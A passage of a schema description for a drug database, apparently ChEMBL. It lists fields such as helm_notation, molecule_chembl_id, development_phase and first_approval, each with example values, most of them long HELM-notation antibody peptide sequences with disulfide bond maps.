# N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.
# H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE3,PEPTIDE4,222
# :R3-214:R3|PEPTIDE4,PEPTIDE4,134:R3-194:R3|PEPTIDE1,PEPTIDE1,134:R3-194:R3
# |PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,146:R3-202:R3|PEPTIDE2,PE
# PTIDE1,222:R3-214:R3|PEPTIDE2,PEPTIDE2,369:R3-427:R3|PEPTIDE3,PEPTIDE3,263
# :R3-323:R3|PEPTIDE2,PEPTIDE2,263:R3-323:R3|PEPTIDE4,PEPTIDE4,23:R3-88:R3|P
# EPTIDE1,PEPTIDE1,23:R3-88:R3|PEPTIDE2,PEPTIDE3,231:R3-231:R3|PEPTIDE3,PEPT
# IDE3,369:R3-427:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE3,PEPTIDE3,146:R3-
# 202:R3|PEPTIDE2,PEPTIDE3,228:R3-228:R3$$$' , 'PEPTIDE1{D.I.Q.M.T.Q.S.P.S.S
# .V.S.A.S.I.G.D.R.V.T.I.T.C.R.A.S.Q.G.I.D.N.W.L.G.W.Y.Q.Q.K.P.G.K.A.P.K.L.L
# .I.Y.D.A.S.N.L.D.T.G.V.P.S.R.F.S.G.S.G.S.G.T.Y.F.T.L.T.I.S.S.L.Q.A.E.D.F.A
# .V.Y.F.C.Q.Q.A.K.A.F.P.P.T.F.G.G.G.T.K.V.D.I.K.G.T.V.A.A.P.S.V.F.I.F.P.P.S
# .D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N
# .S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E
# .V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{E.V.Q.L.V.Q.S.G.G.G.L.V.K
# .P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.S.M.N.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.S
# .I.S.S.S.S.S.Y.I.Y.Y.A.D.S.V.K.G.R.F.T.I.S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R
# .A.E.D.T.A.V.Y.Y.C.A.R.V.T.D.A.F.D.I.W.G.Q.G.T.M.V.T.V.S.S.A.S.T.K.G.P.S.V
# .F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A
# .L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I
# .C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G
# .G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V
# .K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H
# .Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q
# .V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N
# .G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N
# .V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E.V.Q.L.V.Q
# .S.G.G.G.L.V.K.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.S.M.N.W.V.R.Q.A.P.G.K
# .G.L.E.W.V.S.S.I.S.S.S.S.S.Y.I.Y.Y.A.D.S.V.K.G.R.F.T.I.S.R.D.N.A.K.N.S.L.Y
# .L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.V.T.D.A.F.D.I.W.G.Q.G.T.M.V.T.V.S.S.A
# .S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T
# .V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S
# .L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C
# .P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V
# .S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V
# .S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K
# .G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I
# .A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K
# .S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTID
# E4{D.I.Q.M.T.Q.S.P.S.S.V.S.A.S.I.G.D.R.V.T.I.T.C.R.A.S.Q.G.I.D.N.W.L.G.W.Y
# .Q.Q.K.P.G.K.A.P.K.L.L.I.Y.D.A.S.N.L.D.T.G.V.P.S.R.F.S.G.S.G.S.G.T.Y.F.T.L
# .T.I.S.S.L.Q.A.E.D.F.A.V.Y.F.C.Q.Q.A.K.A.F.P.P.T.F.G.G.G.T.K.V.D.I.K.G.T.V
# .A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q
# .W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A
# .D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE3,PEP
# TIDE4,219:R3-214:R3|PEPTIDE2,PEPTIDE2,143:R3-199:R3|PEPTIDE1,PEPTIDE1,23:R
# 3-88:R3|PEPTIDE3,PEPTIDE3,366:R3-424:R3|PEPTIDE3,PEPTIDE3,260:R3-320:R3|PE
# PTIDE2,PEPTIDE3,225:R3-225:R3|PEPTIDE2,PEPTIDE2,366:R3-424:R3|PEPTIDE3,PEP
# TIDE3,143:R3-199:R3|PEPTIDE4,PEPTIDE4,134:R3-194:R3|PEPTIDE2,PEPTIDE2,260:
# R3-320:R3|PEPTIDE2,PEPTIDE1,219:R3-214:R3|PEPTIDE1,PEPTIDE1,134:R3-194:R3|
# PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTI
# DE3,228:R3-228:R3|PEPTIDE4,PEPTIDE4,23:R3-88:R3$$$' , 'PEPTIDE1{D.I.Q.M.T.
# Q.S.P.S.S.L.S.A.S.V.G.D.R.V.T.I.T.C.R.A.S.Q.G.I.S.R.W.L.A.W.Y.Q.Q.K.P.E.K.
# A.P.K.S.L.I.Y.A.A.S.S.L.Q.S.G.V.P.S.R.F.S.G.S.G.S.G.T.D.F.T.L.T.I.S.S.L.Q.
# P.E.D.F.A.T.Y.Y.C.Q.Q.Y.N.T.Y.P.R.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.
# I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.
# L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.
# V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{Q.V.Q.L.V.E.S.G.
# G.G.V.V.Q.P.G.R.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.D.M.H.W.V.R.Q.A.P.G.K.G.L.
# E.W.V.A.V.I.W.Y.D.G.S.N.K.Y.Y.A.D.S.V.K.G.R.F.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.
# M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.G.S.G.N.W.G.F.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.
# A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.
# T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.
# S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.
# C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.
# V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.
# V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.
# K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.
# I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.
# K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K.G.S.S}
# |PEPTIDE3{Q.V.Q.L.V.E.S.G.G.G.V.V.Q.P.G.R.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.
# D.M.H.W.V.R.Q.A.P.G.K.G.L.E.W.V.A.V.I.W.Y.D.G.S.N.K.Y.Y.A.D.S.V.K.G.R.F.T.
# I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.G.S.G.N.W.G.F.F.
# D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.
# L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.
# L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.
# E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.
# I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.
# K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.
# A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.
# S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.
# D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.
# Q.K.S.L.S.L.S.P.G.K.G.S.S}|PEPTIDE4{D.I.Q.M.T.Q.S.P.S.S.L.S.A.S.V.G.D.R.V.
# T.I.T.C.R.A.S.Q.G.I.S.R.W.L.A.W.Y.Q.Q.K.P.E.K.A.P.K.S.L.I.Y.A.A.S.S.L.Q.S.
# G.V.P.S.R.F.S.G.S.G.S.G.T.D.F.T.L.T.I.S.S.L.Q.P.E.D.F.A.T.Y.Y.C.Q.Q.Y.N.T.
# Y.P.R.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.
# S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.
# S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.
# V.T.K.S.F.N.R.G.E.C}$PEPTIDE1,PEPTIDE1,134:R3-194:R3|PEPTIDE3,PEPTIDE3,263
# :R3-323:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,146:R3-202:R3|P
# EPTIDE4,PEPTIDE4,134:R3-194:R3|PEPTIDE2,PEPTIDE2,369:R3-427:R3|PEPTIDE3,PE
# PTIDE4,222:R3-214:R3|PEPTIDE2,PEPTIDE3,228:R3-228:R3|PEPTIDE3,PEPTIDE3,146
# :R3-202:R3|PEPTIDE2,PEPTIDE1,222:R3-214:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|P
# EPTIDE2,PEPTIDE2,263:R3-323:R3|PEPTIDE2,PEPTIDE3,231:R3-231:R3|PEPTIDE1,PE
# PTIDE1,23:R3-88:R3|PEPTIDE3,PEPTIDE3,369:R3-427:R3|PEPTIDE4,PEPTIDE4,23:R3
# -88:R3$$$' , 'PEPTIDE1{I.M.D.Q.V.P.F.S.V}$$$$' , 'PEPTIDE1{D.I.Q.L.T.Q.S.P
# .S.S.L.S.A.S.V.G.D.R.V.T.M.T.C.R.A.S.S.S.V.S.Y.I.H.W.F.Q.Q.K.P.G.K.A.P.K.P
# .W.I.Y.A.T.S.N.L.A.S.G.V.P.V.R.F.S.G.S.G.S.G.T.D.Y.T.F.T.I.S.S.L.Q.P.E.D.I
# .A.T.Y.Y.C.Q.Q.W.T.S.N.P.P.T.F.G.G.G.T.K.L.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P
# .S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G
# .N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C
# .E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{Q.V.Q.L.Q.Q.S.G.A.E.V.K
# .K.P.G.S.S.V.K.V.S.C.K.A.S.G.Y.T.F.T.S.Y.N.M.H.W.V.K.Q.A.P.G.Q.G.L.E.W.I.G
# .A.I.Y.P.G.M.G.D.T.S.Y.N.Q.K.F.K.G.K.A.T.L.T.A.D.E.S.T.N.T.A.Y.M.E.L.S.S.L
# .R.S.E.D.T.A.F.Y.Y.C.A.R.S.T.Y.Y.G.G.D.W.Y.F.D.V.W.G.Q.G.T.T.V.T.V.S.S.A.S
# .T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V
# .S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L
# .G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.R.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P
# .A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S
# .H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S
# .V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G
# .Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A
# .V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S
# .R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3
# {Q.V.Q.L.Q.Q.S.G.A.E.V.K.K.P.G.S.S.V.K.V.S.C.K.A.S.G.Y.T.F.T.S.Y.N.M.H.W.V
# .K.Q.A.P.G.Q.G.L.E.W.I.G.A.I.Y.P.G.M.G.D.T.S.Y.N.Q.K.F.K.G.K.A.T.L.T.A.D.E
# .S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.F.Y.Y.C.A.R.S.T.Y.Y.G.G.D.W.Y.F.D.V.W
# .G.Q.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C
# .L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S
# .L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.R.V.E.P.K
# .S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R
# .T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R
# .E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P
# .A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T
# .C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S
# .F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S
# .L.S.L.S.P.G.K}|PEPTIDE4{D.I.Q.L.T.Q.S.P.S.S.L.S.A.S.V.G.D.R.V.T.M.T.C.R.A
# .S.S.S.V.S.Y.I.H.W.F.Q.Q.K.P.G.K.A.P.K.P.W.I.Y.A.T.S.N.L.A.S.G.V.P.V.R.F.S
# .G.S.G.S.G.T.D.Y.T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.Q.Q.W.T.S.N.P.P.T.F.G.G
# .G.T.K.L.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N
# .N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S
# .L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R
# .G.E.C}$PEPTIDE3,PEPTIDE3,371:R3-429:R3|PEPTIDE2,PEPTIDE1,224:R3-213:R3|PE
# PTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,148:R3-204:R3|PEPTIDE1,PEPTI
# DE1,133:R3-193:R3|PEPTIDE1,PEPTIDE1,23:R3-87:R3|PEPTIDE4,PEPTIDE4,23:R3-87
# :R3|PEPTIDE3,PEPTIDE3,265:R3-325:R3|PEPTIDE3,PEPTIDE3,148:R3-204:R3|PEPTID
# E4,PEPTIDE4,133:R3-193:R3|PEPTIDE2,PEPTIDE2,265:R3-325:R3|PEPTIDE2,PEPTIDE
# 2,22:R3-96:R3|PEPTIDE3,PEPTIDE4,224:R3-213:R3|PEPTIDE2,PEPTIDE2,371:R3-429
# :R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPTIDE3,233:R3-233:R3$$$' ,
# 'PEPTIDE1{E.I.V.L.T.Q.S.P.A.T.L.S.L.S.P.G.E.R.A.T.L.S.C.S.A.S.I.S.V.S.Y.M.
# Y.W.Y.Q.Q.K.P.G.Q.A.P.R.L.L.I.Y.D.M.S.N.L.A.S.G.I.P.A.R.F.S.G.S.G.S.G.T.D.
# F.T.L.T.I.S.S.L.E.P.E.D.F.A.V.Y.Y.C.M.Q.W.S.G.Y.P.Y.T.F.G.G.G.T.K.V.E.I.K.
# R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.
# K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.
# S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE
# 2{E.V.Q.L.V.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.P.F.A.M.S.W.
# V.R.Q.A.P.G.K.G.L.E.W.V.A.K.I.S.P.G.G.S.W.T.Y.Y.S.D.T.V.T.G.R.F.T.I.S.R.D.
# N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.Q.L.W.G.Y.Y.A.L.D.I.W.G.
# Q.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.
# V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.
# S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.
# C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.
# P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.
# E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.
# P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.
# L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.
# F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.
# S.L.S.P.G.K}|PEPTIDE3{E.V.Q.L.V.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.
# F.T.F.S.P.F.A.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.A.K.I.S.P.G.G.S.W.T.Y.Y.S.D.T.
# V.T.G.R.F.T.I.S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.Q.L.
# W.G.Y.Y.A.L.D.I.W.G.Q.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.
# S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.
# V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.
# K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.
# P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.
# V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.
# C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.
# L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.
# P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.
# L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{E.I.V.L.T.Q.S.P.A.T.L.S.L.S.P.G.
# E.R.A.T.L.S.C.S.A.S.I.S.V.S.Y.M.Y.W.Y.Q.Q.K.P.G.Q.A.P.R.L.L.I.Y.D.M.S.N.L.
# A.S.G.I.P.A.R.F.S.G.S.G.S.G.T.D.F.T.L.T.I.S.S.L.E.P.E.D.F.A.V.Y.Y.C.M.Q.W.
# S.G.Y.P.Y.T.F.G.G.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.
# T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.
# Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.
# S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE1,PEPTIDE1,23:R3-87:R3|PEPTIDE3,PEPTIDE4,2
# 22:R3-213:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE1,PEPTIDE1,133:R3-193:R3
# |PEPTIDE4,PEPTIDE4,133:R3-193:R3|PEPTIDE2,PEPTIDE2,146:R3-202:R3|PEPTIDE3,
# PEPTIDE3,369:R3-427:R3|PEPTIDE2,PEPTIDE1,222:R3-213:R3|PEPTIDE3,PEPTIDE3,1
# 46:R3-202:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE3,PEPTIDE3,263:R3-323:R3
# |PEPTIDE2,PEPTIDE2,263:R3-323:R3|PEPTIDE2,PEPTIDE3,228:R3-228:R3|PEPTIDE4,
# PEPTIDE4,23:R3-87:R3|PEPTIDE2,PEPTIDE2,369:R3-427:R3|PEPTIDE2,PEPTIDE3,231
# :R3-231:R3$$$'
'molecule_chembl_id': 'TEXT',
# EXAMPLES:
# 'CHEMBL3990010' , 'CHEMBL2109520' , 'CHEMBL3989983' , 'CHEMBL2109674' , 'C
# HEMBL3545192' , 'CHEMBL2108827' , 'CHEMBL1201642' , 'CHEMBL2109648' , 'CHE
# MBL2109626' , 'CHEMBL3989992'
}
},
'black_box': 'BOOLEAN',
# EXAMPLES:
# 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'F
# alse' , 'False'
'chirality': 'NUMERIC',
# EXAMPLES:
# '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1'
'development_phase': 'NUMERIC',
# EXAMPLES:
# '0' , '0' , '0' , '4' , '0' , '0' , '0' , '1' , '0' , '0'
'drug_type': 'NUMERIC',
# EXAMPLES:
# '-1' , '-1' , '10' , '-1' , '3' , '-1' , '-1' , '1' , '-1' , '6'
'first_approval': 'NUMERIC',
# EXAMPLES:
# '1982' , '1997' , '1988' , '1998' , '1982' , '1993' , '1994' , '1994' , '2018' , '
# 1990'
'first_in_class': 'BOOLEAN',
# EXAMPLES:
# 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'False' , 'F
# alse' , 'False'
'helm_notation': 'TEXT',
# EXAMPLES:
# 'PEPTIDE1{D.I.Q.M.T.Q.R.P.D.S.L.S.A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.G.D.Q.K.
# N.Y.L.T.W.Y.Q.Q.K.P.G.Q.P.P.K.L.L.I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.G.S.G.S.G.T.D.F.
# T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.Q.N.D.Y.S.Y.P.W.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.
